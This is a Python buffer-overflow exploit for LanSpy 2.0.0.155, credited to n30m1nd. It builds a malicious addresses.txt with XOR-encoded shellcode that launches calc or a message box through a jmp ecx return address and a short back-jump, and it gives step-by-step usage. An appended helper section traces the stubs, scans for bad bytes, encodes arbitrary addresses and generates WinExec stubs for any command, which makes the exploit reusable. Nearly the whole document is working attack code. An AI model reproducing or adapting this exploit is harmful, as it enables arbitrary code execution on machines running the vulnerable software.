
80 lines
2.3 KiB
Python
Executable file
#!/usr/bin/env python3
### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ###

# Date: 2016-10-18
# Exploit Author: n30m1nd
# Vendor Homepage: www.lantricks.com
# Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe
# Version: LanSpy 2.0.0.155
# Tested on: Win7 32bit and Win10 64 bit

# Platforms
# =========
# Tested on Win7 32bit and Win10 64 bit
# This exploit should work everywhere since the binary does not implement DEP nor ASLR

# Credits
# =======
# Shouts to hyp3rlinx for the PoC:
# https://www.exploit-db.com/exploits/38399/
# http://hyp3rlinx.altervista.org/
# And shouts to the crew at Offensive Security for their huge efforts on making
# the infosec community better

# How to
# ======
# * Run this python script. It will generate an "addresses.txt" file.
# * Replace this file in the root directory of your LanSpy.exe installation.
# * Run LanSpy.exe and start the scan or do so by pressing F3.
#   - You can also call LanSpy.exe from the command line like the following and
#     it will run the exploit straight away: echo n30 | C:\Path\To\LanSpy.exe

# Exploit code
# ============

import struct
import sys

# 32bit Alphanum-ish shellcodes
# Bad chars detected: 00 2d 20
#
# Both stubs avoid the bad chars the same way: the target address is never
# written literally; instead two bad-char-free constants are XOR-ed into a
# zeroed EAX to rebuild it, then "push eax ; ret" transfers control to it.
# The addresses are inside LanSpy.exe itself, which is why the missing ASLR
# matters.

# MessageBoxA at => 00404D80
#   xor eax, eax        ; 31 C0
#   push eax            ; 50            -> NUL terminator for the string
#   push "pwnd"         ; 68 70 77 6E 64
#   push esp / pop edi  ; 54 5F         -> edi = &"pwnd"
#   push eax            ; 50            -> uType = 0
#   push edi / push edi ; 57 57         -> lpCaption, lpText
#   push eax            ; 50            -> hWnd = 0
#   xor eax, 0x558080C4 ; 35 C4 80 80 55
#   xor eax, 0x55C0CD44 ; 35 44 CD C0 55   => eax = 0x00404D80
#   push eax / ret      ; 50 C3         -> MessageBoxA(0, "pwnd", "pwnd", 0)
msgbox_shellcode = (
    b"\x31\xC0\x50\x68"
    b"\x70\x77\x6E\x64"
    b"\x54\x5F\x50\x57"
    b"\x57\x50\x35\xC4"
    b"\x80\x80\x55\x35"
    b"\x44\xCD\xC0\x55"
    b"\x50\xC3"
)

# WinExec at -> 004EC4FF
#   xor eax, eax        ; 31 C0
#   push eax            ; 50            -> NUL terminator for the string
#   push "calc"         ; 68 63 61 6C 63
#   push esp / pop edi  ; 54 5F         -> edi = &"calc"
#   push eax            ; 50            -> uCmdShow = 0
#   push edi            ; 57            -> lpCmdLine
#   xor eax, 0x55C34EC3 ; 35 C3 4E C3 55
#   xor eax, 0x558D8A3C ; 35 3C 8A 8D 55   => eax = 0x004EC4FF
#   push eax / ret      ; 50 C3         -> WinExec("calc", 0)
calc_shellcode = (
    b"\x31\xC0\x50\x68"
    b"\x63\x61\x6C\x63"
    b"\x54\x5F\x50\x57"
    b"\x35\xC3\x4E\xC3"
    b"\x55\x35\x3C\x8A"
    b"\x8D\x55\x50\xC3"
)

# Change the shellcode to be used here
scde = calc_shellcode
#scde = msgbox_shellcode

# The shellcode sits at the start of a 126-byte window. Right after that window
# comes the 2-byte short jump \x74\x80 (jz -0x80): the 8-bit displacement is
# relative to the *next* instruction, so from the opcode itself it lands
# 2 - 128 = 126 bytes back, exactly at the start of our shellcode. Being a
# conditional jump it is only taken with ZF set, which is the state the
# exploit relies on (and sees) when control reaches it on the tested targets.
junk = b'A' * (676 - 126)

if len(scde) > 126:
    sys.exit("[e] Shellcode is too big! Egghunter maybe? ;)")

# 0040407D => jmp ecx inside LanSpy (overwrites the saved return address;
# the trailing NUL of the little-endian address is the last byte written)
jecx = b'A' * (126 - len(scde)) + b'\x74\x80CC' + struct.pack('<I', 0x0040407D)

# Junk + shellcode + padding + first-stage jump (back to the shellcode)
# + return address (jmp ecx, which lands on that first-stage jump)
payl = junk + scde + jecx

with open("addresses.txt", "wb") as f:
    f.write(payl)
|
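The stubs above reach MessageBoxA and WinExec by XOR-ing two bad-char-free constants into EAX and returning into the result, and the 126-byte window with the short back-jump only works if the arithmetic is exact. The block below is an added example (my code, not n30m1nd's and not part of the exploit-db entry) that traces those two stubs to recover the address they return into, scans any buffer for the page's bad chars (00 2d 20), generates a clean XOR pair for an arbitrary address, builds a WinExec stub in the same shape for other 4-byte-multiple commands, and computes where the `\x74\x80` jump lands in the assembled payload. The stub bytes, the `jmp ecx` address 0x0040407D and the 676/126 layout are copied from the script; every function name is an assumption of this example.

```python
import struct

# Bad bytes reported for this target on the page: NUL, '-' and space.
BADCHARS = frozenset({0x00, 0x2D, 0x20})

# The two stubs from the exploit, copied verbatim so this block runs stand-alone.
CALC_STUB = (b"\x31\xC0\x50\x68" b"\x63\x61\x6C\x63" b"\x54\x5F\x50\x57"
             b"\x35\xC3\x4E\xC3" b"\x55\x35\x3C\x8A" b"\x8D\x55\x50\xC3")
MSGBOX_STUB = (b"\x31\xC0\x50\x68" b"\x70\x77\x6E\x64" b"\x54\x5F\x50\x57"
               b"\x57\x50\x35\xC4" b"\x80\x80\x55\x35" b"\x44\xCD\xC0\x55"
               b"\x50\xC3")
JMP_ECX = 0x0040407D   # jmp ecx inside LanSpy, as used by the exploit

# Single-byte opcodes the stubs use; anything else is rejected rather than guessed.
ONE_BYTE = {0x50: "push eax", 0x54: "push esp", 0x57: "push edi",
            0x5F: "pop edi", 0xC3: "ret"}

def trace_stub(stub):
    """Decode only the opcodes these stubs use and return (listing, eax), where
    eax is the value in EAX when RET is reached, i.e. the address returned into."""
    eax, listing, i = None, [], 0
    while i < len(stub):
        op = stub[i]
        if op == 0x31 and stub[i + 1] == 0xC0:          # xor eax, eax
            eax = 0
            listing.append("xor eax, eax")
            i += 2
        elif op == 0x35:                                 # xor eax, imm32
            imm = struct.unpack_from("<I", stub, i + 1)[0]
            eax ^= imm
            listing.append(f"xor eax, 0x{imm:08X}")
            i += 5
        elif op == 0x68:                                 # push imm32
            listing.append(f"push {stub[i + 1:i + 5]!r}")
            i += 5
        elif op in ONE_BYTE:
            listing.append(ONE_BYTE[op])
            i += 1
        else:
            raise ValueError(f"unhandled opcode 0x{op:02X} at offset {i}")
    return listing, eax

def find_badchars(data, badchars=BADCHARS):
    """Offsets and values of every bad byte in data."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]

def xor_encode(value, badchars=BADCHARS):
    """Return 'xor eax, k1 ; xor eax, k2' (10 bytes) with k1 ^ k2 == value and
    neither constant containing a bad byte. Assumes EAX == 0 beforehand."""
    k1, k2 = bytearray(), bytearray()
    for tb in struct.pack("<I", value):
        for cand in range(1, 256):
            if cand not in badchars and (cand ^ tb) not in badchars:
                k1.append(cand)
                k2.append(cand ^ tb)
                break
        else:
            raise ValueError(f"no clean XOR pair for byte 0x{tb:02X}")
    return b"\x35" + bytes(k1) + b"\x35" + bytes(k2)

def build_winexec_stub(cmd, winexec_addr):
    """WinExec(cmd, 0) stub in the same shape as the exploit's calc stub, for a
    command whose length is a multiple of 4 (pushed in whole dwords, so no
    padding bytes that might themselves be bad chars are needed)."""
    if len(cmd) % 4:
        raise ValueError("cmd length must be a multiple of 4")
    stub = b"\x31\xC0\x50"                       # xor eax,eax ; push eax (NUL terminator)
    for i in range(len(cmd) - 4, -1, -4):
        stub += b"\x68" + cmd[i:i + 4]           # push the string, last dword first
    stub += b"\x54\x5F"                          # push esp ; pop edi  -> edi = &cmd
    stub += b"\x50\x57"                          # push 0 (uCmdShow) ; push edi (lpCmdLine)
    stub += xor_encode(winexec_addr)             # eax = WinExec, no bad bytes emitted
    stub += b"\x50\xC3"                          # push eax ; ret -> WinExec(cmd, 0)
    return stub

def build_payload(stub, ret=JMP_ECX):
    """Same layout as the exploit: junk, stub, padding to 126 bytes, the 2-byte
    JZ back to the stub, 2 filler bytes, then the return address."""
    if len(stub) > 126:
        raise ValueError("stub too large for the 126-byte window")
    return (b"A" * (676 - 126) + stub + b"A" * (126 - len(stub))
            + b"\x74\x80CC" + struct.pack("<I", ret))

def backjump_target(payload, off):
    """Destination of the short jump at payload[off] (opcode + rel8); the
    displacement is relative to the next instruction, hence the +2."""
    rel = struct.unpack_from("<b", payload, off + 1)[0]
    return off + 2 + rel
```

Run against the script's own data, `trace_stub` resolves 0x004EC4FF for the calc stub and 0x00404D80 for the MessageBox stub, the jump at offset 676 lands on offset 550 where the stub begins, and the only bad byte `find_badchars` reports in the full 684-byte payload is the trailing NUL of the little-endian 0x0040407D, which the original exploit also writes as its very last byte. Any stub you generate with `build_winexec_stub` can be passed through the same two checks before it replaces `scde`.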